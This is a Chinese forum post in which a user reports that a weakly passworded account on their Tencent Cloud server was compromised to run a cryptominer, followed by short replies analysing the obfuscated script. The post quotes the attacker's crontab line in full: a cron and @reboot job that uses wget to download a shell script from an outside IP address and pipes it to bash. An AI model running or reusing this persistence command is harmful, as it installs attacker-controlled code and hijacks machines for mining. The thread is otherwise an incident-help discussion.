未分類
29 4 月 2020

腾讯云小主机被入侵部了一个挖矿程序

腾讯云小主机被入侵部了一个挖矿程序

資深大佬 : wmhx 52

好久没登录了, 今天发现很卡,就发现有个简单密码的用户的 crontab 被改了执行一个 msr 程序:

crontab -l: */15 * * * * [ “$(ps -fe|grep msr|grep -v grep|wc -l)” -eq 0 ] && wget -qO – http://185.43.207.36/.d/test.sh | bash @reboot [ “$(ps -fe|grep msr|grep -v grep|wc -l)” -eq 0 ] && wget -qO – http://185.43.207.36/.d/test.sh | bash

那个 test.sh 可以下载,没看懂内容, 只知道执行了一个 msr 的程序特别耗 CPU;

没看出来这是啥东西. 谁帮忙给介绍下.

大佬有話說 (3)

  • 資深大佬 : opengps

    不知道是种什么脚本,不知道执行的程序是不是通过脚本下载的

  • 資深大佬 : neighbads

    前面就是一堆变量, 第二行 展开后是

    echo “$s 的 base64 编码” | rev |base64 -d

    然后得到的一堆再 eval、里面有 msr 的下载,写的乱糟糟

    腾讯云小主机被入侵部了一个挖矿程序

  • 資深大佬 : yanheqi

    为什么会被入侵?密码太简单被破解?